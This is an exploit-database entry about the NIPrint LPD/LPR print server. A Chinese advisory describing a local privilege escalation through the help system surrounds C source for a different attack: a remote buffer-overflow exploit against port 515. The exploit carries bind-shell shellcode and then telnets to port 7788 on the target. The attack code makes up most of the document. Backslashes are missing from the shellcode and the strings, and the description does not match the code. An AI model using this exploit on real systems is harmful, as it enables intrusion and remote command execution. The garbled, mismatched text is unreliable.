https://www.exploit-db.com/exploits/116
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200311-013

NIPrint是一款32-bit的WinsockLPD/LPR打印服务程序。NIPrint调用Explorer没有进行正确的权限限制，本地攻击者可以利用这个漏洞提升权限。NIPrint默认以SYSTEM权限以服务方式运行，所有用户可以在任务栏中本地通过图标进行访问，不过问题是NIPrint使用的帮助系统可能以SYSTEM权限调用Explorer，因此攻击者可以利用这个问题以管理员权限使用Explorer运行任意命令。

/*
	remote exploit for NIPrint LPD-LPR Print Server (Version <= 4.10)
/
	by xCrZx /BLack Sand Project/ /04.11.03/
/
	bug found by KF
/	successfully tested on Win XP 5.1.2600
/	P.S.#1 coded just for fun...
	P.S.#2 this exploit can be compiled under Win32 and *nix
*/


#ifdef _WIN32

 #include <winsock.h>
 #include <windows.h>

#else

 #include <netinet/in.h>  
 #include <netdb.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/stat.h>
 #include <fcntl.h>
 #include <unistd.h>
 #include <errno.h>

#endif

#include <stdio.h>

// JMP ESP ADDRESS (in Win XP 5.1.2600)
#define RET 0x77F5801c
#define SHELL 7788

char shellcode[] =

        "x90xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90"
        "x90x8bxc5x33xc9x66xb9x10x03x50x80x30x97x40xe2xfa"
        "x7ex8ex95x97x97xcdx1cx4dx14x7cx90xfdx68xc4xf3x36"
        "x97x97x97x97xc7xf3x1exb2x97x97x97x97xa4x4cx2cx97"
        "x97x77xe0x7fx4bx96x97x97x16x6cx97x97x68x28x98x14"
        "x59x96x97x97x16x54x97x97x96x97xf1x16xacxdaxcdxe2"
        "x70xa4x57x1cxd4xabx94x54xf1x16xafxc7xd2xe2x4ex14"
        "x57xefx1cxa7x94x64x1cxd9x9bx94x5cx16xaexdcxd2xc5"
        "xd9xe2x52x16xeex93xd2xdbxa4xa5xe2x2bxa4x68x1cxd1"
        "xb7x94x54x1cx5cx94x9fx16xaexd0xf2xe3xc7xe2x9ex16"
        "xeex93xe5xf8xf4xd6xe3x91xd0x14x57x93x7cx72x94x68"
        "x94x6cx1cxc1xb3x94x6dxa4x45xf1x1cx80x1cx6dx1cxd1"
        "x87xdfx94x6fxa4x5ex1cx58x94x5ex94x5ex94xd9x8bx94"
        "x5cx1cxaex94x6cx7exfex96x97x97xc9x10x60x1cx40xa4"
        "x57x60x47x1cx5fx65x38x1exa5x1axd5x9fxc5xc7xc4x68"
        "x85xcdx1exd5x93x1axe5x82xc5xc1x68xc5x93xcdxa4x57"
        "x3bx13x57xe2x6exa4x5ex1dx99x13x5exe3x9exc5xc1xc4"
        "x68x85xcdx3cx75x7fxd1xc5xc1x68xc5x93xcdx1cx4fxa4"
        "x57x3bx13x57xe2x6exa4x5ex1dx99x17x6ex95xe3x9exc5"
        "xc1xc4x68x85xcdx3cx75x70xa4x57xc7xd7xc7xd7xc7x68"
        "xc0x7fx04xfdx87xc1xc4x68xc0x7bxfdx95xc4x68xc0x67"
        "xa4x57xc0xc7x27x9bx3cxcfx3cxd7x3cxc8xdfxc7xc0xc1"
        "x3axc1x68xc0x57xdfxc7xc0x3axc1x3axc1x68xc0x57xdf"
        "x27xd3x1ex90xc0x68xc0x53xa4x57x1cxd1x63x1exd0xab"
        "x1exd0xd7x1cx91x1exd0xafxa4x57xf1x2fx96x96x1exd0"
        "xbbxc0xc0xa4x57xc7xc7xc7xd7xc7xdfxc7xc7x3axc1xa4"
        "x57xc7x68xc0x5fx68xe1x67x68xc0x5bx68xe1x6bx68xc0"
        "x5bxdfxc7xc7xc4x68xc0x63x1cx4fxa4x57x23x93xc7x56"
        "x7fx93xc7x68xc0x43x1cx67xa4x57x1cx5fx22x93xc7xc7"
        "xc0xc6xc1x68xe0x3fx68xc0x47x14xa8x96xebxb5xa4x57"
        "xc7xc0x68xa0xc1x68xe0x3fx68xc0x4bx9cx57xe3xb8xa4"
        "x57xc7x68xa0xc1xc4x68xc0x6fxfdxc7x68xc0x77x7cx5f"
        "xa4x57xc7x23x93xc7xc1xc4x68xc0x6bxc0xa4x5exc6xc7"
        "xc1x68xe0x3bx68xc0x4fxfdxc7x68xc0x77x7cx3dxc7x68"
        "xc0x73x7cx69xcfxc7x1exd5x65x54x1cxd3xb3x9bx92x2f"
        "x97x97x97x50x97xefxc1xa3x85xa4x57x54x7cx7bx7fx75"
        "x6ax68x68x7fx05x69x68x68xdcxc1x70xe0xb4x17x70xe0"
        "xdbxf8xf6xf3xdbxfexf5xe5xf6xe5xeexd6x97xdcxd2xc5"
        "xd9xd2xdbxa4xa5x97xd4xe5xf2xf6xe3xf2xc7xfexe7xf2"
        "x97xd0xf2xe3xc4xe3xf6xe5xe3xe2xe7xdexf9xf1xf8xd6"
        "x97xd4xe5xf2xf6xe3xf2xc7xe5xf8xf4xf2xe4xe4xd6x97"
        "xd4xfbxf8xe4xf2xdfxf6xf9xf3xfbxf2x97xc7xf2xf2xfc"
        "xd9xf6xfaxf2xf3xc7xfexe7xf2x97xd0xfbxf8xf5xf6xfb"
        "xd6xfbxfbxf8xf4x97xc0xe5xfexe3xf2xd1xfexfbxf2x97"
        "xc5xf2xf6xf3xd1xfexfbxf2x97xc4xfbxf2xf2xe7x97xd2"
        "xefxfexe3xc7xe5xf8xf4xf2xe4xe4x97x97xc0xc4xd8xd4"
        "xdcxa4xa5x97xe4xf8xf4xfcxf2xe3x97xf5xfexf9xf3x97"
        "xfbxfexe4xe3xf2xf9x97xf6xf4xf4xf2xe7xe3x97xe4xf2"
        "xf9xf3x97xe5xf2xf4xe1x97x95x97x89xfbx97x97x97x97"
        "x97x97x97x97x97x97x97x97xf4xfaxf3xb9xf2xefxf2x97"
        "x68x68x68x68";


long getip(char *hostname) {
	struct hostent *he;
	long ipaddr;
	
	if ((ipaddr = inet_addr(hostname)) < 0) {
		if ((he = gethostbyname(hostname)) == NULL) {
			perror("gethostbyname()");
			exit(-1);
		}
		memcpy(&ipaddr, he->h_addr, he->h_length);
	}	
	return ipaddr;
}

int main(int argc, char **argv) {

#ifdef _WIN32
	WSADATA wsaData;
#endif

	int sock;
	struct sockaddr_in sockstruct;
	char tmp[2000];


	if(!argv[1]) { printf("Usage: %s <address>n",argv[0]);exit(0); }

#ifdef _WIN32

	if(WSAStartup(0x101,&wsaData)){
        printf("Unable to initialize WinSock lib.n");
        exit(0);
	}

#endif

	memset(sockstruct.sin_zero,0x00,sizeof(sockstruct.sin_zero));
	sock=socket(PF_INET,SOCK_STREAM,0);
	sockstruct.sin_family=PF_INET; 
    	sockstruct.sin_addr.s_addr=getip(argv[1]);
    	sockstruct.sin_port=htons(515);

	if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

	    printf("[+] Connected to %s:515!n",argv[1]);

		memset(tmp,0x00,sizeof tmp);
		memset(tmp,0x41,49);
		*(long *)&tmp[strlen(tmp)]=RET;
		memset(tmp+strlen(tmp),0x90,50);
		memcpy(tmp+strlen(tmp),&shellcode,strlen(shellcode));
		send(sock,tmp,strlen(tmp),0);
		printf("[+] Exploit code was sent!n");
    }

#ifdef _WIN32
	closesocket(sock);
	WSACleanup();
#else
	close(sock);
#endif

	printf("[+] Connecting to %s:%dn",argv[1],SHELL);
	sprintf(tmp,"telnet %s %dn",argv[1],SHELL);
	system(tmp);
	printf("[-] Not connected! NIPrint probably not vulnerable!n");

	return 0;
}

// milw0rm.com [2003-11-04]

来源:XF
名称:niprint-helpapi-gain-privileges(13592)
链接:http://xforce.iss.net/xforce/xfdb/13592
来源:BID
名称:8969
链接:http://www.securityfocus.com/bid/8969
来源:BUGTRAQ
名称:20031104SRT2003-11-02-0218-NIPrintLPD-LPRLocalHelpAPISYSTEMexploit
链接:http://www.securityfocus.com/archive/1/343258